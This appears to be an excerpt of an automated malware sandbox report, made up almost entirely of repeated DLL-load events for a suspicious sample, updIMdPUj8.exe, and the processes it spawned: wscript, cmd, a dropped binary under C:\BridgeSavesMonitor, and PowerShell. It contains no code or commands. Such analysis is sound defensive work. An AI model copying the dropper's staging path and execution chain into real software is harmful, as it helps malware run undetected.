                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: riched20.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: usp10.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: version.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: slc.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
